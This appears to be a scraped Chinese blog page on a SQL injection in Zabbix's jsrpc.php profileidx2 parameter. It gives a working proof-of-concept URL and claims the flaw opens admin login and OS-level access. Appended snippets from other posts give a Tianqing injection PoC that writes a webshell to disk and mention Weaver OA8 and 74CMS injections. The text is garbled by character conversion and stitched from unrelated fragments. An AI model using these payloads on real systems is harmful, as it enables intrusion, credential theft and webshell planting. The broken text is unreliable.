zabbix前台jsrpc注入

2022-02-11 10:00:01 字數 1282 閱讀 6191

zabbix是乙個開源的企業級效能監控解決方案。

官方**:

zabbix的jsrpc的profileidx2引數存在insert方式的sql注入漏洞,攻擊者無需授權登陸即可登陸zabbix管理系統,也可通過script等功能輕易直接獲取zabbix伺服器的作業系統許可權。

首先開啟登入頁面 檢測是否可以guest登入。

然後xx.com/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pagefile=history.php&profileidx=web.item.graph&profileidx2=2'3297&updateprofile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5b23297%5d=23297&action=showlatest&filter=&filter_task=&mark_color=1

如出現mysql報錯提示,則表示存在該sql注入漏洞。

獲取密碼hash:

天擎 前台SQL注入

https api dp rptsvcsyncpoint?ccid 1 create table o t text insert into o t values copy o t to 目標檔案寫入路徑 drop table o 本段poc將首先建立新的資料庫表,後將資料庫內容更名為webshell...

泛微OA8前台SQL注入

漏洞url 注入點在getdata.jsp中,直接將request物件交給 方法處理 在getdata方法中,判斷請求裡cmd引數是否為空,如果不為空,呼叫proc方法 proc方法4個引數,空字串 cmd引數值 request物件,servercontext物件 在proc方法中,對cmd引數值進...

74CMS 3 0 SQL注入漏洞前台

1.雙擊執行桌面phpstudy.exe軟體 2.點選啟動按鈕,啟動伺服器環境 1.雙擊啟動桌面seay源 審計系統軟體 2.因為74cms3.0源 編輯使用gbk編輯,所以首先需要先將編碼改成gbk 3.點選新建專案按鈕,彈出對畫框中選擇 c phpstudy www 74cms 點選確定 漏洞分...